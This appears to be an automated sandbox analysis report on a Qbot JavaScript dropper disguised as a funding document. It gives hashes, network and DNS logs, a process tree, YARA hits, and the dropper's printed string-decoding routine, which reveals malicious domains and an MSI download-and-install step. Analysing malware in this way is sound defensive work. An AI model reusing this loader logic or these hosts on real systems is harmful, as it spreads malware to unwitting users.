                                                                                                                                                                                                          MD5:728071432EDD86E0F409E56F049713EE
                                                                                                                                                                                                          SHA1:323CFD840E915D18EEE7B26940BD5EC7C96BDB7A
                                                                                                                                                                                                          SHA-256:8145EC08F28849AAB41165038EE8D14A1C6BDAD2E40456A7653FBB3FDFF5C53D
                                                                                                                                                                                                          SHA-512:95C4082EC1CBB9A8B3EF7BBACCE7300836FA5F16F4EF669EA42DCBB2E40033B886689511C281216C9F5E9289B0ADE8E2E57BC5F8B81A24233BAED9C9408362FF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                          Entropy (8bit):1.2160379124181024
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:96sHudGMLFXO1T5xwnTuLMS59CuSiyZuLMSI818lPh:NHaoTXAPQCWU
                                                                                                                                                                                                          MD5:728071432EDD86E0F409E56F049713EE
                                                                                                                                                                                                          SHA1:323CFD840E915D18EEE7B26940BD5EC7C96BDB7A
                                                                                                                                                                                                          SHA-256:8145EC08F28849AAB41165038EE8D14A1C6BDAD2E40456A7653FBB3FDFF5C53D
                                                                                                                                                                                                          SHA-512:95C4082EC1CBB9A8B3EF7BBACCE7300836FA5F16F4EF669EA42DCBB2E40033B886689511C281216C9F5E9289B0ADE8E2E57BC5F8B81A24233BAED9C9408362FF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          File type:ASCII text, with very long lines (1337), with CRLF line terminators
                                                                                                                                                                                                          Entropy (8bit):5.540540865355687
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                            File name:ProjectFunding_450726_Jun01.js
                                                                                                                                                                                                            File size:1400
                                                                                                                                                                                                            MD5:a657553449746c482dacfe3b19119b7a
                                                                                                                                                                                                            SHA1:630b815d443f8f7ef7e4c4c7c100de1cd8a7ed53
                                                                                                                                                                                                            SHA256:44e029dd6210c4906a82e1f16dd5ebed434efd225dafb92fc560e6ff6d1ee948
                                                                                                                                                                                                            SHA512:dea33536a5c5fe279ca1a8a3d4639be0f49d5ca3c21f4cbbda10c5d059837c2bc4c3917cdbddd0fc9f4a0773f325369b200f0df8e0035da6afab26f09502c321
                                                                                                                                                                                                            SSDEEP:24:5PyzicY1VBFAMhY1VBcrFKW/KOXNY5vevO7VoYDT2ADpBiW+bDwi8H9i3VIwmq2O:54MZr5FYNOlyDpB2bDwVH9KVMq2YGfBK
                                                                                                                                                                                                            TLSH:EB21BE1708699DBC25F78BC52F0C5C81F0FFC2B2DAD4C4335851C88A4089A9AEE2587D
                                                                                                                                                                                                            File Content Preview:// quapqospufftqhkzhpufbasppgs..var _$_cdc5=(function(_0x1CEE1,_0x1CE96){var _0x1D184=_0x1CEE1.length;var _0x1D00D=[];for(var _0x1CE4B=0;_0x1CE4B< _0x1D184;_0x1CE4B++){_0x1D00D[_0x1CE4B]= _0x1CEE1.charAt(_0x1CE4B)};for(var _0x1CE4B=0;_0x1CE4B< _0x1D184;_0
                                                                                                                                                                                                            Icon Hash:68d69b8bb6aa9a86
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jun 1, 2023 17:54:26.911286116 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:26.911387920 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:26.911590099 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:26.917148113 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:26.917186975 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.018752098 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.018986940 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.026257992 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.026293993 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.026689053 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.070065022 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.252960920 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.300285101 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446471930 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446522951 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446533918 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446559906 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446588993 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446597099 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446620941 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446640015 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446656942 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446669102 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446686029 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446712017 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446719885 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.446755886 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.475120068 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.475155115 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.475271940 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.475296974 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.475342035 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.475370884 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.475413084 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.475447893 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.482527018 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.482556105 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.482625008 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.482635021 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.482701063 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504024029 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504059076 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504162073 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504179955 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504195929 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504245043 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504291058 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504370928 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504390001 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504466057 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.504472971 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.511022091 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.511059046 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.511158943 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.511168957 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.511183023 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.511200905 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.511261940 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.511267900 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.514539003 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.514574051 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.514648914 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.514657974 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.514695883 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533071041 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533102989 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533313990 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533339024 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533409119 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533441067 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533484936 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533494949 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533514977 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533715963 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533734083 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533776045 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533783913 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.533819914 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534010887 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534038067 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534071922 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534076929 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534107924 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534305096 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534328938 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534364939 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534369946 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534404993 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534612894 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534636974 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534684896 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534693003 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534717083 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534909010 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534936905 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534970999 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.534976959 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.535000086 CEST49702443192.168.2.3217.195.153.225
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.547291994 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:54:27.547328949 CEST44349702217.195.153.225192.168.2.3
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jun 1, 2023 17:54:26.863465071 CEST5692453192.168.2.38.8.8.8
                                                                                                                                                                                                            Jun 1, 2023 17:54:26.897725105 CEST53569248.8.8.8192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:57:30.286569118 CEST6062553192.168.2.38.8.8.8
                                                                                                                                                                                                            Jun 1, 2023 17:57:30.309791088 CEST53606258.8.8.8192.168.2.3
                                                                                                                                                                                                            Jun 1, 2023 17:57:31.101705074 CEST4930253192.168.2.38.8.8.8
                                                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                            Jun 1, 2023 17:58:01.667659998 CEST103.144.201.48192.168.2.3f091(Host unreachable)Destination Unreachable
                                                                                                                                                                                                            Jun 1, 2023 17:58:01.667686939 CEST103.144.201.48192.168.2.3f091(Host unreachable)Destination Unreachable
                                                                                                                                                                                                            Jun 1, 2023 17:58:01.667702913 CEST103.144.201.48192.168.2.3f091(Host unreachable)Destination Unreachable
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Jun 1, 2023 17:54:26.863465071 CEST192.168.2.38.8.8.80xd570Standard query (0)garokelka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jun 1, 2023 17:57:30.286569118 CEST192.168.2.38.8.8.80xb643Standard query (0)cisco.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jun 1, 2023 17:57:31.101705074 CEST192.168.2.38.8.8.80xd67cStandard query (0)www.cisco.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Jun 1, 2023 17:54:26.897725105 CEST8.8.8.8192.168.2.30xd570No error (0)garokelka.com217.195.153.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jun 1, 2023 17:57:30.309791088 CEST8.8.8.8192.168.2.30xb643No error (0)cisco.com72.163.4.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jun 1, 2023 17:57:31.161915064 CEST8.8.8.8192.168.2.30xd67cNo error (0)www.cisco.comwww.cisco.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            • garokelka.com
                                                                                                                                                                                                            • cisco.com

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:17:54:24
                                                                                                                                                                                                            Start date:01/06/2023
                                                                                                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ProjectFunding_450726_Jun01.js"
                                                                                                                                                                                                            Imagebase:0x7ff605460000
                                                                                                                                                                                                            File size:163840 bytes
                                                                                                                                                                                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:17:54:26
                                                                                                                                                                                                            Start date:01/06/2023
                                                                                                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                            Imagebase:0x7ff66f8d0000
                                                                                                                                                                                                            File size:66048 bytes
                                                                                                                                                                                                            MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:17:54:28
                                                                                                                                                                                                            Start date:01/06/2023
                                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
                                                                                                                                                                                                            Imagebase:0x7ff6d99b0000
                                                                                                                                                                                                            File size:69632 bytes
                                                                                                                                                                                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:17:54:28
                                                                                                                                                                                                            Start date:01/06/2023
                                                                                                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
                                                                                                                                                                                                            Imagebase:0x7ff605460000
                                                                                                                                                                                                            File size:163840 bytes
                                                                                                                                                                                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                            Start time:17:54:28
                                                                                                                                                                                                            Start date:01/06/2023
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
                                                                                                                                                                                                            Imagebase:0xec0000
                                                                                                                                                                                                            File size:61952 bytes
                                                                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.385257108.000000000047A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.385365210.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:17:54:32
                                                                                                                                                                                                            Start date:01/06/2023
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                                                            Imagebase:0xf0000
                                                                                                                                                                                                            File size:191904 bytes
                                                                                                                                                                                                            MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Script:

                                                                                                                                                                                                            Code
                                                                                                                                                                                                            0
                                                                                                                                                                                                            var _$_cdc5 = ( function (_0x1CEE1, _0x1CE96) {
                                                                                                                                                                                                            • (".asowkadeetoi%krtirSlanceo/tntciiaacrnl.l%seds%cocrrgiPk%im.tmnmolaimulmbrfone.aw%%tlnss:sko%sctaagtr%mosol.r%u/asargtgnioatu.ahiorndse%skoplIihr/%.m%t%k.nomlinrgck%t",4527110) ➔ garokelka.com,lakirasa.com,tofinka.com,koriska.com,retrenia.com,gurakis.com,length,windowsinstaller.installer,substring,toString,random,https://,/,.msi,InstallProduct
                                                                                                                                                                                                            • (".asowkadeetoi%krtirSlanceo/tntciiaacrnl.l%seds%cocrrgiPk%im.tmnmolaimulmbrfone.aw%%tlnss:sko%sctaagtr%mosol.r%u/asargtgnioatu.ahiorndse%skoplIihr/%.m%t%k.nomlinrgck%t",4527110) ➔ garokelka.com,lakirasa.com,tofinka.com,koriska.com,retrenia.com,gurakis.com,length,windowsinstaller.installer,substring,toString,random,https://,/,.msi,InstallProduct
                                                                                                                                                                                                            1
                                                                                                                                                                                                            var _0x1D184 = _0x1CEE1.length;
                                                                                                                                                                                                              2
                                                                                                                                                                                                              var _0x1D00D = [];
                                                                                                                                                                                                                3
                                                                                                                                                                                                                for ( var _0x1CE4B = 0 ; _0x1CE4B < _0x1D184 ; _0x1CE4B ++ )
                                                                                                                                                                                                                  4
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                    5
                                                                                                                                                                                                                    _0x1D00D[_0x1CE4B] = _0x1CEE1.charAt ( _0x1CE4B );
                                                                                                                                                                                                                      6
                                                                                                                                                                                                                      }
                                                                                                                                                                                                                        7
                                                                                                                                                                                                                        ;
                                                                                                                                                                                                                          8
                                                                                                                                                                                                                          for ( var _0x1CE4B = 0 ; _0x1CE4B < _0x1D184 ; _0x1CE4B ++ )
                                                                                                                                                                                                                            9
                                                                                                                                                                                                                            {
                                                                                                                                                                                                                              10
                                                                                                                                                                                                                              var _0x1D265 = _0x1CE96 * ( _0x1CE4B + 173 ) + ( _0x1CE96 % 22546 );
                                                                                                                                                                                                                                11
                                                                                                                                                                                                                                var _0x1D2B0 = _0x1CE96 * ( _0x1CE4B + 132 ) + ( _0x1CE96 % 16474 );
                                                                                                                                                                                                                                  12
                                                                                                                                                                                                                                  var _0x1D139 = _0x1D265 % _0x1D184;
                                                                                                                                                                                                                                    13
                                                                                                                                                                                                                                    var _0x1D1CF = _0x1D2B0 % _0x1D184;
                                                                                                                                                                                                                                      14
                                                                                                                                                                                                                                      var _0x1CF77 = _0x1D00D[_0x1D139];
                                                                                                                                                                                                                                        15
                                                                                                                                                                                                                                        _0x1D00D[_0x1D139] = _0x1D00D[_0x1D1CF];
                                                                                                                                                                                                                                          16
                                                                                                                                                                                                                                          _0x1D00D[_0x1D1CF] = _0x1CF77;
                                                                                                                                                                                                                                            17
                                                                                                                                                                                                                                            _0x1CE96 = ( _0x1D265 + _0x1D2B0 ) % 4875549;
                                                                                                                                                                                                                                              18
                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                19
                                                                                                                                                                                                                                                ;
                                                                                                                                                                                                                                                  20
                                                                                                                                                                                                                                                  var _0x1D058 = String.fromCharCode ( 127 );
                                                                                                                                                                                                                                                    21
                                                                                                                                                                                                                                                    var _0x1D21A = '';
                                                                                                                                                                                                                                                      22
                                                                                                                                                                                                                                                      var _0x1D0EE = '\x25';
                                                                                                                                                                                                                                                        23
                                                                                                                                                                                                                                                        var _0x1CF2C = '\x23\x31';
                                                                                                                                                                                                                                                          24
                                                                                                                                                                                                                                                          var _0x1CFC2 = '\x25';
                                                                                                                                                                                                                                                            25
                                                                                                                                                                                                                                                            var i = '\x23\x30';
                                                                                                                                                                                                                                                              26
                                                                                                                                                                                                                                                              var _0x1D0A3 = '\x23';
                                                                                                                                                                                                                                                                27
                                                                                                                                                                                                                                                                return _0x1D00D.join ( _0x1D21A ).split ( _0x1D0EE ).join ( _0x1D058 ).split ( _0x1CF2C ).join ( _0x1CFC2 ).split ( i ).join ( _0x1D0A3 ).split ( _0x1D058 );
                                                                                                                                                                                                                                                                • g,a,r,o,k,e,l,k,a,.,c,o,m,%,l,a,k,i,r,a,s,a,.,c,o,m,%,t,o,f,i,n,k,a,.,c,o,m,%,k,o,r,i,s,k,a,.,c,o,m,%,r,e,t,r,e,n,i,a,.,c,o,m,%,g,u,r,a,k,i,s,.,c,o,m,%,l,e,n,g,t,h,%,w,i,n,d,o,w,s,i,n,s,t,a,l,l,e,r,.,i,n,s,t,a,l,l,e,r,%,s,u,b,s,t,r,i,n,g,%,t,o,S,t,r,i,n,g,%,r,a,n,d,o,m,%,h,t,t,p,s,:,/,/,%,/,%,.,m,s,i,%,I,n,s,t,a,l,l,P,r,o,d,u,c,t.join("") ➔ "garokelka.com%lakirasa.com%tofinka.com%koriska.com%retrenia.com%gurakis.com%length%windowsinstaller.installer%substring%toString%random%https://%/%.msi%InstallProduct"
                                                                                                                                                                                                                                                                • "garokelka.com%lakirasa.com%tofinka.com%koriska.com%retrenia.com%gurakis.com%length%windowsinstaller.installer%substring%toString%random%https://%/%.msi%InstallProduct".split("%") ➔ garokelka.com,lakirasa.com,tofinka.com,koriska.com,retrenia.com,gurakis.com,length,windowsinstaller.installer,substring,toString,random,https://,/,.msi,InstallProduct
                                                                                                                                                                                                                                                                • garokelka.com,lakirasa.com,tofinka.com,koriska.com,retrenia.com,gurakis.com,length,windowsinstaller.installer,substring,toString,random,https://,/,.msi,InstallProduct.join("\x7f") ➔ "garokelka.com\x7flakirasa.com\x7ftofinka.com\x7fkoriska.com\x7fretrenia.com\x7fgurakis.com\x7flength\x7fwindowsinstaller.installer\x7fsubstring\x7ftoString\x7frandom\x7fhttps://\x7f/\x7f.msi\x7fInstallProduct"
                                                                                                                                                                                                                                                                • "garokelka.com\x7flakirasa.com\x7ftofinka.com\x7fkoriska.com\x7fretrenia.com\x7fgurakis.com\x7flength\x7fwindowsinstaller.installer\x7fsubstring\x7ftoString\x7frandom\x7fhttps://\x7f/\x7f.msi\x7fInstallProduct".split("#1") ➔ garokelka.com\x7flakirasa.com\x7ftofinka.com\x7fkoriska.com\x7fretrenia.com\x7fgurakis.com\x7flength\x7fwindowsinstaller.installer\x7fsubstring\x7ftoString\x7frandom\x7fhttps://\x7f/\x7f.msi\x7fInstallProduct
                                                                                                                                                                                                                                                                • garokelka.com\x7flakirasa.com\x7ftofinka.com\x7fkoriska.com\x7fretrenia.com\x7fgurakis.com\x7flength\x7fwindowsinstaller.installer\x7fsubstring\x7ftoString\x7frandom\x7fhttps://\x7f/\x7f.msi\x7fInstallProduct.join("%") ➔ "garokelka.com\x7flakirasa.com\x7ftofinka.com\x7fkoriska.com\x7fretrenia.com\x7fgurakis.com\x7flength\x7fwindowsinstaller.installer\x7fsubstring\x7ftoString\x7frandom\x7fhttps://\x7f/\x7f.msi\x7fInstallProduct"
